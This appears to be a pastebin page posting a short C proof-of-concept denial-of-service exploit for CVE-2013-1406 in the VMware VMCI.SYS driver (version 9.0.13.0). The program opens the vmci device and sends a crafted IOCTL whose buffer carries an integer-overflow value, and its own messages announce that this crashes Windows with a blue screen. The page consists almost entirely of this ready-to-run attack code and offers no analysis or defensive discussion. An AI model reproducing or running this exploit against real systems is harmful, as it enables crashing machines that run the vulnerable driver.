CVE-2013-1406 PoC DOS exploit

SUBMITTED BY: Guest

DATE: March 8, 2013, 9:26 p.m.

FORMAT: Text only

SIZE: 1.4 kB

Raw Download

HITS: 1456

Report
  1. /*
  2. This PoC only for version
  3. VMCI.SYS 9.0.13.0
  4. */
  6. #include "stdafx.h"
  7. #include "windows.h"
  9. #define count_massive 0x189
  10. #define ioctl_vmsock 0x8103208C
  11. #define integer_overflow_size 0x12492492;
  14. int _tmain(int argc, _TCHAR* argv[])
  15. {
  16. HANDLE vmci_device;
  17. DWORD bytesRet;
  18. int inbuf [count_massive];
  19. int outbuf[count_massive];
  20. int size_=count_massive*sizeof(int);
  22. printf("**************************************************\r\n");
  23. printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
  24. printf("**************************************************\r\n");
  25. //opening vmci interface device
  26. vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
  27. if (vmci_device!=INVALID_HANDLE_VALUE)
  28. {
  29. printf("[+]vmci device opened \r\n");
  30. //prepare input buffer
  31. memset(&inbuf,0,size_);
  32. //vulnerable to integer overflowing parameter
  33. inbuf[4]=integer_overflow_size;
  34. printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
  35. //Delaying signed with Diablo stamp :D
  36. Sleep(0x29a);
  37. Sleep(0x1000);
  38. DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
  39. CloseHandle(vmci_device);
  40. }
  41. else
  42. {
  43. printf("[-]Error: Can't open vmci device!\r\n");
  44. }
  45. return 0;
  46. }
comments powered by Disqus